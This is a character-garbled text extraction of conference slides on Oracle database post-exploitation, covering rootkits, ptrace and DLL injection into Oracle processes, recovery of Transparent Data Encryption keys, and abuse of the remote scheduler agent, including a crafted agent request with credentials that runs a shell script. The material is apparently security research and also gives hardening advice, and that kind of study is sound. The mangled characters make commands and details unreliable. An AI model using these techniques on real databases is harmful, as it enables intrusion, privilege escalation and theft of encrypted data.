Hacktivity LT 2010 en PDF

Oracle post exploitation
techniques
Lszl Tth
donctl@gmail.com

Disclaimer
The views expressed in this presentation
are my own and not necessarily the views
o my current! past or uture employers.

"ontent
#
$ntroduction
#
%very&ody 'nows this so let(s do it quic'ly
#
DLL in)ection *+indows! Linux,
#
-ttac' cryptographic unctions in the
data&ase *TD%! d&ms.crypto! etc,
#
/emote 0o& 1cheduling

$ntroduction
#
There are many well 'now techniques or
post exploitation
#
This presentation will concentrate on own
research results
2
DLL in)ection
2
Transparent Data&ase %ncryption
2
0O3 scheduling
2
/elease o rora'it or 4o"

Let(s do it quic'ly
#
The common steps
2
/unning commands at the operating system level
0-5-! d&ms.scheduler! extproc etc.
2
-ccess iles
utl.ile! d&ms.lo&! 0-5- etc.
#
Less common! &ut equally! i not more important
2
6ind T7% 1%81$T$5% inormation in the data&ase
2
8on9D3- access can &e enough *hey we want
the D-T-,
#
/oot'its *some&ody saw them in the wild:,

Let(s do it quic'ly

Let(s do it quic'ly

Let(s do it quic'ly
#
/oot'its
2
-lex ;orn&ust
#
<
st
generation= modiy views! stored procedures
#
>
nd
generation= e.g. modiy the Oracle &inaries
#
?
rd
generation= modiy the 1@-
2
David Litchield=
#
Load DLL
#
"hange the system user hash through an exploit
2
Dennis Aurichev
#
/eplace B.o ile in the Oracle li&raries
ar 9x CO/-"L%.7OD%Eli&Eli&server<<.a 'zia.o

Let(s do it quic'ly
-n Oracle data&ase stores relatively high
num&er o passwords! depending on the
installed eatures and applications. 6or
example=
2
%D passwords *Detalin'! proxy!
D@DT.5$%+! d&snmp,
2
-4%F
2
1cheduler
2
...

Let(s do it quic'ly
+e are tal'ing post exploitation here! so you
need the highest privilege

Let(s do it quic'ly

Let(s do it quic'ly

DLL in)ection
#
On +indows we use the well 'nown DLL
in)ection techniques
#
On Linux we use ptrace calls to modiy the
Oracle process to load our li&rary and
redirect the given unction calls
#
The 4o" wor's on ?>&it only *GH&it will
come,

DLL in)ection
#
The Linux is more interesting here! &ecause it is
not a common technique! on +indows even
malware apply the same technique
#
$ ound one example ssh in phrac' magazine IJ
#
Lot(s o things changed since then in gli&c
#
$t logged the pam calls and it can easily call the
real unctions rom the li&raries. *$ have only the
Oracle executa&le.,

DLL in)ection
#
On +indows everything in DLLs
#
On Linux the Oracle executa&le contains
almost everything

DLL in)ection
The in)ector shellcode! which will &e written
at the &eginning o the isalpha unction

DLL in)ection

DLL in)ection

DLL in)ection

DLL in)ection
Oracle on +indows is
multithreaded
2
$t(s enough to in)ect
only one process
2
Aou have to deine
rom which module it
is called and which
module contains the
unction. $ it is called
rom a dierent
module it won(t &e
redirected
Oracle on Linux is
multiprocess
2
Aou have to in)ect all
processes
2
%very call will &e
redirected in the
in)ected process

DLL in)ection
$n theory &oth pro&lems can &e solved
2
On Linux the listener process or's an Oracle
process when some&ody logs in! so we
should in)ect the listener process to detect the
creation o the new Oracle processes
2
On +indows we can implement the hi)ac'
with the same technique as on Linux
Day&e in a uture version

"rypto
$ concentrated on cryptography unctions
2
D3D1.O36K1"-T$O8.TOOL;$T
2
D3D1."/A4TO
2
Lot(s o crypto in the authentication
2
2
1tored passwords in the data&ase

"rypto
D3D1.O36K1"-T$O8.TOOL;$T D3D1."/A4TO
D%1 ?D%1 DDI DDI
17-<
DDH
D%1 ?D%1 -%1
LT"7
LT"%%8"
LT"%D%"
O/-"L%
orancrypt<<g.dll oran<<g.dll
On windows it happens
through DLLs
On Linux these are
direct calls

"rypto
3ased on= http=EEdownload.oracle.comEdocsEcdE3<J?MG.M<Eappdev.<M>E&<H>INEd.crypto.htm

"rypto

TD%
#
introduced in <Mg /el >
#
$t is part o the -dvanced 1ecurity Option
#
$n <Mg it can encrypt on a column &asis
#
$n <<g it can encrypt on a ta&lespace &asis

TD%
#
The master 'ey is stored in a wallet!
outside o the data&ase
#
TD% protects the data on the ile system!
not in the data&ase
#
$ the wallet is open! the data 2 according
to the access rights 2 can &e accessed

TD%
ewallet.p<>
Daster;ey
O30O ... "OL;L"
H<H<H...
%8"C
Ta≤ey
O/-"L%
select enccol rom secretP
%8""OL
secret<
secret>
%8""OL
?H3D...
GI-6...
>
<
?
H
I

TD%
ewallet.p<> Daster;ey
O/-"L%
<
Ta&lespace ile
?
H
3loc'
select col rom secretP
"OL
secret<
secret>
>
I
Ta&lespace 'ey

TD%
#
Oracle handles &loc's at the ile level
#
The ta&le space 'ey is at the second
&loc'QMx?<M *a &loc' can have various
sizes,
;ey length *>BN &ytes, %ncrypted ta&lespace 'ey

TD%
The $5 is at the &eginning o each &loc'
3eginning o the &loc'
$5= N?MMNM<JIJH<>MM M> MMMMMMMM

TD%
#
1pecial than's goes to @ergely Tth who 2 as a
recreation activity 2 developed an Oracle wallet
dumper in )ava
#
$ did a little modiication o the ora&loc' tool rom
David Litchield(s great cadile toolset to wor'
with my examples
#
1pecial than's goes to ;urt 5an Deer&eec' who
allowed me to use his excellent )DKD% tool to
test my results

TD%

TD%
Length o the column
$5 *is there &y deault! &ut can
&e omitted with R8O 1-LTS,
17-< hash or integrity

TD%

#
$ntroduced in <<g
#
$t allows to run )o&s on machines where
there is no data&ase installed
#
Aou have to install the 1cheduler -gent
rom the Transparent @ateway dis'

7ow it wor's *Linux,=
2
There is the schagent )ava program that
accepts the connection rom the networ'
2
1chagent calls the )ssu executa&le in the
CO/-"L%.7OD%E&in directory
2
The result is sent &ac' to the data&ase
through FD3

1ecurity $.
2
The networ' connection is protected with 11L
&etween the data&ase and the agent
2
Operating system user and password are
needed to run a )o& on the agent(s machine
2
To handle the previous! a new o&)ect type
called "/%D%8T$-L was introduced *access
can &e managed inside the data&aseT,
2
The agent has to &e registered into the
data&ase

0O3 request to the schagent
Oracle FDL Data&ase
0O3 results sent to FD3
6rom <<.> it can &e encrypted
%ncrypted with 11L! the server
chec's the client certiicate


The registration happens only once at the
&eginning! so $ concentrated on other parts!
&ut )ust to show what is happening=
password.hashU7mac17-<*passwordQnonce!
certQpasswordQcurrentTimeQhostname,
tr'eyU17-<*passwordQnonceQcurrentTimeQhostname,
V<..<GW
enc.'eyU-%1*tr'ey! random generated 'ey,



O course we can log it=
IHGIX?XH?<?>???H
Test<>?H

1ecurity $$.
2
Disa&ling unctions
#
D$1-3L%.4KT.6$L%U6-L1%
#
D$1-3L%.@%T.6$L%U6-L1%
#
D$1-3L%.0O3.%F%"KT$O8U6-L1%
2
/estriction o users
#
D%8A.K1%/1Uroot!administrator!guest
#
-LLO+.K1%/1U

O i this is set to T/K%! only registered data&ases will &e allowed to su&mit
O )o&s and the agent will only &e a&le to register with data&ase versions <<.>
O or higher. This enorces a higher level o security including encryption o
O )o& results.
1%"K/%.D-T-3-1%1.O8LAUT/K%
-ny guess what will &e the general practice:

#
1o we can have the
username and
password *rom a
hac'ed data&ase,
#
"an we send a request
to the agent:
@%T E 7TT4E<.<
7ost= o<<gr>c=<IMM
1ource= o<<gr>
1ource9D3= O/"L
1ource94ort= <GM><
-ction= /K8
"ommand= EtmpEtest.sh
0o&9$d= XHGM<
0o&98ame= DA0O3
0o&91u&name=
0o&9Owner= 1A1
Ksername= oracle
4assword= Test<>?H
Domain=
/equest9$d= <M<XNM<HXX
"redential9Owner= 1A1
"redential98ame= L-3"/%D
"onnection= close

#
+e can escalate our privileges to the
remote agent
#
+e can &ruteorce a password remotely
*that is why the user restrictions are
important,
#
Two other small notes
2
There is a 5%/1$O8 query
2
$t is worth to loo' closer at the )ssu &inary


$ 'now this is )ust a )o'e =,! &ut you have a wor'ing
su! so at least &e careul who can run the )ssu
&inary *oinstall group &y deault,

#
The user who runs )o&s should not have
access to su! sudo and the )ssu &inaries
#
$ heEshe has! heEshe can &ypass the user
restrictions &y calling the &inaries through
a )o&
#
The coniguration o the agent should &e
as restricted as possi&le


O;! &ut we are tal'ing a&out post
exploitation and what i
1%"K/%.D-T-3-1%1.O8LAUT/K%


s

Yuestions

1ummary
#
Don(t orget T7% D-T- is important
#
+e can easily log the crypto unction o Oracle
data&ases
#
$t was shown how the TD% unction can &e
attac'ed or recovered
#
+e analyzed the security o the /emote 0o&
1cheduling eature

#
http=EEwww.soonerorlater.huE
#
http=EE&logs.conus.inoE
#
http=EEwww.red9data&ase9
security.comEwpEoracle.root'its.>.M.pd
#
http=EEwww.data&asesecurity.comEoracle9
&ac'doors.ppt
#
http=EEwww.data&asesecurity.comEd&secELocatin
g9Dropped9O&)ects.pd
#
http=EEwww.codepro)ect.comE;3EthreadsEcomplet
ein)ect.aspx
K/Ls

Hacktivity LT 2010 en PDF

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Hacktivity LT 2010 en PDF

Hochgeladen von

Copyright:

Verfügbare Formate

Oracle post exploitation

Das könnte Ihnen auch gefallen